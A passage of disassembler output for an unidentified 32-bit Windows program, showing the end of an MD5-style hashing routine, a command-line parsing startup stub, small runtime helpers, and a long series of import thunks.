add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_447BBC
add [edi], eax
mov eax, dword_447BC0
add [edi+4], eax
mov eax, dword_447BC4
add [edi+8], eax
mov eax, dword_447BC8
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40BDE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C630 proc near ; CODE XREF: sub_4098A8+1010�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C630 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C654 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C728 ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C688
push 22h
mov eax, edi
inc eax
push eax
call sub_40CC80
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C6A3
mov edi, eax
inc edi
jmp short loc_40C680
; ---------------------------------------------------------------------------
loc_40C67F: ; CODE XREF: sub_40C654+2F�j
inc edi
loc_40C680: ; CODE XREF: sub_40C654+29�j
cmp byte ptr [edi], 20h
jz short loc_40C67F
jmp short loc_40C6A3
; ---------------------------------------------------------------------------
loc_40C687: ; CODE XREF: sub_40C654+3E�j
inc edi
loc_40C688: ; CODE XREF: sub_40C654+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C694
cmp eax, 20h
jnz short loc_40C687
loc_40C694: ; CODE XREF: sub_40C654+39�j
jmp short loc_40C697
; ---------------------------------------------------------------------------
loc_40C696: ; CODE XREF: sub_40C654+4D�j
inc edi
loc_40C697: ; CODE XREF: sub_40C654:loc_40C694�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C6A3
cmp eax, 20h
jz short loc_40C696
loc_40C6A3: ; CODE XREF: sub_40C654+24�j
; sub_40C654+31�j ...
push 0
call sub_40C77C ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_40AA24
pop edi
leave
retn
sub_40C654 endp
; =============== S U B R O U T I N E =======================================
sub_40C6B8 proc near ; CODE XREF: sub_40133B+8�p
; sub_402A48+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C6B9: ; CODE XREF: sub_40C6B8+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C6B9
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C6B8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C6D8 proc near ; CODE XREF: sub_401BB7+CC�p
; sub_40523D+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C6D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C704 proc near ; CODE XREF: sub_4040AA+190�p
; sub_4061F7+4C5�p ...
jmp ds:dword_448374
sub_40C704 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C710 proc near ; CODE XREF: sub_40AA24+3DE�p
jmp ds:dword_448378
sub_40C710 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C71C proc near ; CODE XREF: sub_4061F7+161�p
; sub_408B4C+16B�p
jmp ds:dword_44837C
sub_40C71C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C728 proc near ; CODE XREF: sub_40C654+5�p
jmp ds:dword_448380
sub_40C728 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C734 proc near ; CODE XREF: sub_40133B+10�p
; sub_40133B:loc_401409�p ...
jmp ds:dword_448384
sub_40C734 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C740 proc near ; CODE XREF: sub_40160A+7�p
; sub_40160A:loc_401694�p ...
jmp ds:dword_448388
sub_40C740 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C74C proc near ; CODE XREF: sub_401A7E+54�p
; sub_4098A8+71C�p
jmp ds:dword_44838C
sub_40C74C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C758 proc near ; CODE XREF: sub_40833E+C8�p
jmp ds:dword_448390
sub_40C758 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C764 proc near ; CODE XREF: sub_4014C9+8C�p
; sub_4014C9:loc_401562�p ...
jmp ds:dword_448394
sub_40C764 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C770 proc near ; CODE XREF: sub_403A5F+117�p
; sub_40406B+35�p ...
jmp ds:dword_448398
sub_40C770 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C77C proc near ; CODE XREF: sub_402226+13�p
; sub_402563+EF�p ...
jmp ds:dword_44839C
sub_40C77C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C788 proc near ; CODE XREF: sub_402226+2B�p
; sub_402226+40�p ...
jmp ds:dword_4483A0
sub_40C788 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C794 proc near ; CODE XREF: sub_401D31:loc_401E3D�p
; sub_401D31+336�p ...
jmp ds:dword_4483A4
sub_40C794 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7A0 proc near ; CODE XREF: sub_40399B+32�p
; sub_4040AA+81�p ...
jmp ds:dword_4483A8
sub_40C7A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7AC proc near ; CODE XREF: sub_40133B+82�p
; sub_401A7E+97�p ...
jmp ds:dword_4483AC
sub_40C7AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7B8 proc near ; CODE XREF: sub_4054C8+123�p
; sub_408B4C+2D�p
jmp ds:dword_4483B0
sub_40C7B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7C4 proc near ; CODE XREF: sub_40181A:loc_40185E�p
; sub_402226+35�p ...
jmp ds:dword_4483B4
sub_40C7C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7D0 proc near ; CODE XREF: sub_40133B+DE�p
; sub_4014C9:loc_40151F�p ...
jmp ds:dword_4483B8
sub_40C7D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7DC proc near ; CODE XREF: sub_4040AA+2E�p
; sub_40AA24+D7�p
jmp ds:dword_4483BC
sub_40C7DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7E8 proc near ; CODE XREF: sub_40399B+71�p
jmp ds:dword_4483C0
sub_40C7E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7F4 proc near ; CODE XREF: sub_4040AA+10B�p
; sub_4098A8+B47�p ...
jmp ds:dword_4483C4
sub_40C7F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C800 proc near ; CODE XREF: sub_40341E+67�p
; sub_4036BC+59�p ...
jmp ds:dword_4483C8
sub_40C800 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C80C proc near ; CODE XREF: sub_40349A+A4�p
; .text:004038FE�p
jmp ds:dword_4483CC
sub_40C80C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C818 proc near ; CODE XREF: sub_40349A+65�p
; .text:004038CB�p
jmp ds:dword_4483D0
sub_40C818 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C824 proc near ; CODE XREF: sub_402A48+204�p
jmp ds:dword_4483D4
sub_40C824 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C830 proc near ; CODE XREF: sub_4061F7+4B�p
jmp ds:dword_4483D8
sub_40C830 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C83C proc near ; CODE XREF: sub_402A48+1CB�p
jmp ds:dword_4483DC
sub_40C83C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C848 proc near ; CODE XREF: sub_402A48+5C3�p
jmp ds:dword_4483E0
sub_40C848 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C854 proc near ; CODE XREF: sub_4023A7+19�p
; sub_402563:loc_40257E�p ...
jmp ds:dword_4483E4
sub_40C854 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C860 proc near ; CODE XREF: sub_402A48+A2�p
jmp ds:dword_4483E8
sub_40C860 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C86C proc near ; CODE XREF: sub_4061F7+490�p
; sub_408B4C+AE�p ...
jmp ds:dword_4483EC
sub_40C86C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C878 proc near ; CODE XREF: sub_401A7E+61�p
; sub_40506F+6E�p ...
jmp ds:dword_4483F0
sub_40C878 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C884 proc near ; CODE XREF: sub_40506F+A2�p
; sub_4054C8+8A�p ...
jmp ds:dword_4483F4
sub_40C884 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C890 proc near ; CODE XREF: sub_40A9BC+2C�p
jmp ds:dword_4483F8
sub_40C890 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C89C proc near ; CODE XREF: sub_40506F+3B�p
jmp ds:dword_4483FC
sub_40C89C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8A8 proc near ; CODE XREF: sub_40133B+68�p
; sub_401A7E+89�p
jmp ds:dword_448400
sub_40C8A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8B4 proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_448404
sub_40C8B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8C0 proc near ; CODE XREF: sub_402A48+4CE�p
; sub_408779+6F�p
jmp ds:dword_448408
sub_40C8C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8CC proc near ; CODE XREF: sub_40133B+34�p
; sub_401A7E+26�p ...
jmp ds:dword_44840C
sub_40C8CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8D8 proc near ; CODE XREF: sub_4051C3+47�p
; sub_408048+1EA�p ...
jmp ds:dword_448410
sub_40C8D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8E4 proc near ; CODE XREF: sub_40833E+E5�p
jmp ds:dword_448414
sub_40C8E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8F0 proc near ; CODE XREF: sub_4061F7+3C2�p
; sub_4061F7+3F5�p
jmp ds:dword_448418
sub_40C8F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8FC proc near ; CODE XREF: sub_4061F7+5FD�p
; sub_408B4C+2A0�p
jmp ds:dword_44841C
sub_40C8FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C908 proc near ; CODE XREF: sub_40864E+15�p
jmp ds:dword_448420
sub_40C908 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C914 proc near ; CODE XREF: sub_40867D+12�p
jmp ds:dword_448424
sub_40C914 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C920 proc near ; CODE XREF: sub_402A48+4F3�p
jmp ds:dword_448428
sub_40C920 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C92C proc near ; CODE XREF: sub_4068C1+3B�p
jmp ds:dword_44842C
sub_40C92C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C938 proc near ; CODE XREF: sub_403A5F+179�p
; sub_404313+12�p ...
jmp ds:dword_448430
sub_40C938 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C944 proc near ; CODE XREF: sub_403A5F+D2�p
; sub_403BE7+2A2�p ...
jmp ds:dword_448434
sub_40C944 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C950 proc near ; CODE XREF: sub_40AA24+5AC�p
jmp ds:dword_448438
sub_40C950 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C95C proc near ; CODE XREF: sub_401BB7+AF�p
; sub_4053FE+12�p ...
jmp ds:dword_44843C
sub_40C95C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C968 proc near ; CODE XREF: sub_4068C1+1F�p
jmp ds:dword_448440
sub_40C968 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C974 proc near ; CODE XREF: sub_4061F7+2FA�p
; sub_408B4C+264�p
jmp ds:dword_448444
sub_40C974 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C980 proc near ; CODE XREF: sub_407F07+35�p
; sub_40AA24+818�p
jmp ds:dword_448448
sub_40C980 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C98C proc near ; CODE XREF: sub_40B2CA+108�p
jmp ds:dword_448454
sub_40C98C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C998 proc near ; CODE XREF: sub_4061F7+40C�p
; sub_406A40+9C�p ...
jmp ds:dword_448458
sub_40C998 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9A4 proc near ; CODE XREF: sub_408ED0+87�p
; sub_40B3E8+ED�p ...
jmp ds:dword_44845C
sub_40C9A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9B0 proc near ; CODE XREF: sub_4061F7+39E�p
jmp ds:dword_448460
sub_40C9B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9BC proc near ; CODE XREF: sub_408E12+23�p
; sub_408E12+9A�p
jmp ds:dword_448464
sub_40C9BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9C8 proc near ; CODE XREF: sub_408E12+56�p
jmp ds:dword_448468
sub_40C9C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9D4 proc near ; CODE XREF: sub_408ED0+9CE�p
; sub_40B2CA+43�p ...
jmp ds:dword_44846C
sub_40C9D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9E0 proc near ; CODE XREF: sub_406D2E+73�p
jmp ds:dword_448470
sub_40C9E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9EC proc near ; CODE XREF: sub_40AA24+500�p
jmp ds:dword_448474
sub_40C9EC endp
; ---------------------------------------------------------------------------
align 8
